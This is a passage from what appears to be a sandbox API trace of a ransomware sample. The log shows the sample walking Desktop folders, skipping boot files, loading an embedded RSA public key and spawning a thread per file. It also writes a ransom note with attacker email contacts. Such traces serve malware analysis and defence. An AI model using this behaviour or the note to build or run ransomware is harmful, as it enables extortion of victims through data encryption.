f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0171.066] lstrcpyW (in: lpString1=0x17addc, lpString2="6IAM.m4a" | out: lpString1="6IAM.m4a") returned="6IAM.m4a" [0171.066] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" [0171.066] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa08 [0171.066] Sleep (dwMilliseconds=0x96) [0171.215] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0171.215] lstrcmpW (lpString1="7IFRA25.gif", lpString2="..") returned 1 [0171.215] lstrcmpW (lpString1="7IFRA25.gif", lpString2=".") returned 1 [0171.215] StrStrW (lpFirst="7IFRA25.gif", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0171.215] StrStrW (lpFirst="7IFRA25.gif", lpSrch="ntldr") returned 0x0 [0171.215] StrStrW (lpFirst="7IFRA25.gif", lpSrch="NTLDR") returned 0x0 [0171.215] StrStrW (lpFirst="7IFRA25.gif", lpSrch="NTDETECT.COM") returned 0x0 [0171.215] StrStrW (lpFirst="7IFRA25.gif", lpSrch="ntdetect.com") returned 0x0 [0171.215] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\") returned 66 [0171.215] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\") [0171.216] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0171.216] lstrcpyW (in: lpString1=0x17addc, lpString2="7IFRA25.gif" | out: lpString1="7IFRA25.gif") returned="7IFRA25.gif" [0171.216] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" [0171.216] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x9f4 [0171.216] Sleep (dwMilliseconds=0x96) [0171.371] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0171.371] lstrcmpW (lpString1="zd0bLbxkM-mx4VZDX_.flv", lpString2="..") returned 1 [0171.371] lstrcmpW (lpString1="zd0bLbxkM-mx4VZDX_.flv", lpString2=".") returned 1 [0171.371] StrStrW (lpFirst="zd0bLbxkM-mx4VZDX_.flv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0171.371] StrStrW (lpFirst="zd0bLbxkM-mx4VZDX_.flv", lpSrch="ntldr") returned 0x0 [0171.371] StrStrW (lpFirst="zd0bLbxkM-mx4VZDX_.flv", lpSrch="NTLDR") returned 0x0 [0171.371] StrStrW (lpFirst="zd0bLbxkM-mx4VZDX_.flv", lpSrch="NTDETECT.COM") returned 0x0 [0171.371] StrStrW (lpFirst="zd0bLbxkM-mx4VZDX_.flv", lpSrch="ntdetect.com") returned 0x0 [0171.371] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\") returned 66 [0171.371] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\") [0171.372] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0171.372] lstrcpyW (in: lpString1=0x17addc, lpString2="zd0bLbxkM-mx4VZDX_.flv" | out: lpString1="zd0bLbxkM-mx4VZDX_.flv") returned="zd0bLbxkM-mx4VZDX_.flv" [0171.372] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" [0171.372] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa0c [0171.372] Sleep (dwMilliseconds=0x96) [0171.556] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0171.556] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 1 [0171.556] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 0 [0171.557] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K" [0171.557] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\*.*" [0171.557] SetErrorMode (uMode=0x1) returned 0x1 [0171.557] wsprintfW (in: param_1=0x17a39c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\_HELP_INSTRUCTION.TXT") returned 83 [0171.557] GetUserNameW (in: lpBuffer=0x178178, pcbBuffer=0x177f64 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x177f64) returned 1 [0171.557] wsprintfW (in: param_1=0x177f70, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0171.557] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x177f6c | out: phkResult=0x177f6c*=0xa00) returned 0x0 [0171.557] RegQueryValueExW (in: hKey=0xa00, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x46a860, lpcbData=0x177f68*=0x104 | out: lpType=0x0, lpData=0x46a860*=0x65, lpcbData=0x177f68*=0x4a) returned 0x0 [0171.557] RegCloseKey (hKey=0xa00) returned 0x0 [0171.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17939c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0171.557] wsprintfW (in: param_1=0x17839c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0171.557] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\3yo4kg3p-k\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.557] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\3yo4kg3p-k\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa00 [0171.558] WriteFile (in: hFile=0xa00, lpBuffer=0x17839c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x178394, lpOverlapped=0x0 | out: lpBuffer=0x17839c*, lpNumberOfBytesWritten=0x178394*=0x2c4, lpOverlapped=0x0) returned 1 [0171.558] CloseHandle (hObject=0xa00) returned 1 [0171.558] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdea18 [0171.558] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K") returned="3Yo4kg3p-K" [0171.558] lstrcpyW (in: lpString1=0x17a5a4, lpString2="3Yo4kg3p-K" | out: lpString1="3Yo4kg3p-K") returned="3Yo4kg3p-K" [0171.558] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0171.559] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0171.559] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0171.559] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0171.559] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0171.559] lstrcmpW (lpString1="0zRcyBT06WYN8R-glJ0", lpString2="..") returned 1 [0171.559] lstrcmpW (lpString1="0zRcyBT06WYN8R-glJ0", lpString2=".") returned 1 [0171.559] lstrcpyW (in: lpString1=0x17b430, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K" [0171.559] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" [0171.559] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\", lpString2="0zRcyBT06WYN8R-glJ0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0" [0171.559] SetErrorMode (uMode=0x1) returned 0x1 [0171.559] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0" [0171.559] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" [0171.559] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" [0171.559] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\*.*" [0171.559] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\*.*", lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 0x3cde9d8 [0171.559] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0") returned="0zRcyBT06WYN8R-glJ0" [0171.559] lstrcpyW (in: lpString1=0x179504, lpString2="0zRcyBT06WYN8R-glJ0" | out: lpString1="0zRcyBT06WYN8R-glJ0") returned="0zRcyBT06WYN8R-glJ0" [0171.559] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0171.559] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0171.559] lstrcmpW (lpString1="8P6C FwpZ.mkv", lpString2="..") returned 1 [0171.559] lstrcmpW (lpString1="8P6C FwpZ.mkv", lpString2=".") returned 1 [0171.559] StrStrW (lpFirst="8P6C FwpZ.mkv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0171.559] StrStrW (lpFirst="8P6C FwpZ.mkv", lpSrch="ntldr") returned 0x0 [0171.559] StrStrW (lpFirst="8P6C FwpZ.mkv", lpSrch="NTLDR") returned 0x0 [0171.559] StrStrW (lpFirst="8P6C FwpZ.mkv", lpSrch="NTDETECT.COM") returned 0x0 [0171.559] StrStrW (lpFirst="8P6C FwpZ.mkv", lpSrch="ntdetect.com") returned 0x0 [0171.560] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\") returned 86 [0171.560] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\") [0171.560] lstrcpyA (in: lpString1=0x17973c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0171.560] lstrcpyW (in: lpString1=0x179d3c, lpString2="8P6C FwpZ.mkv" | out: lpString1="8P6C FwpZ.mkv") returned="8P6C FwpZ.mkv" [0171.560] lstrcpyW (in: lpString1=0x17993c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" [0171.560] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17973c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa10 [0171.560] WaitForSingleObject (hHandle=0xa10, dwMilliseconds=0xffffffff) returned 0x0 [0171.745] Sleep (dwMilliseconds=0x96) [0171.886] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0171.886] lstrcmpW (lpString1="8W8bO.gif", lpString2="..") returned 1 [0171.886] lstrcmpW (lpString1="8W8bO.gif", lpString2=".") returned 1 [0171.886] StrStrW (lpFirst="8W8bO.gif", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0171.886] StrStrW (lpFirst="8W8bO.gif", lpSrch="ntldr") returned 0x0 [0171.886] StrStrW (lpFirst="8W8bO.gif", lpSrch="NTLDR") returned 0x0 [0171.886] StrStrW (lpFirst="8W8bO.gif", lpSrch="NTDETECT.COM") returned 0x0 [0171.886] StrStrW (lpFirst="8W8bO.gif", lpSrch="ntdetect.com") returned 0x0 [0171.886] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\") returned 86 [0171.886] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\") [0171.886] lstrcpyA (in: lpString1=0x17973c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0171.886] lstrcpyW (in: lpString1=0x179d3c, lpString2="8W8bO.gif" | out: lpString1="8W8bO.gif") returned="8W8bO.gif" [0171.886] lstrcpyW (in: lpString1=0x17993c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" [0171.886] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17973c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa1c [0171.887] Sleep (dwMilliseconds=0x96) [0172.042] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0172.042] lstrcmpW (lpString1="lTddMw6tEfsH.wav", lpString2="..") returned 1 [0172.042] lstrcmpW (lpString1="lTddMw6tEfsH.wav", lpString2=".") returned 1 [0172.042] StrStrW (lpFirst="lTddMw6tEfsH.wav", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0172.042] StrStrW (lpFirst="lTddMw6tEfsH.wav", lpSrch="ntldr") returned 0x0 [0172.042] StrStrW (lpFirst="lTddMw6tEfsH.wav", lpSrch="NTLDR") returned 0x0 [0172.042] StrStrW (lpFirst="lTddMw6tEfsH.wav", lpSrch="NTDETECT.COM") returned 0x0 [0172.042] StrStrW (lpFirst="lTddMw6tEfsH.wav", lpSrch="ntdetect.com") returned 0x0 [0172.042] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\") returned 86 [0172.042] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 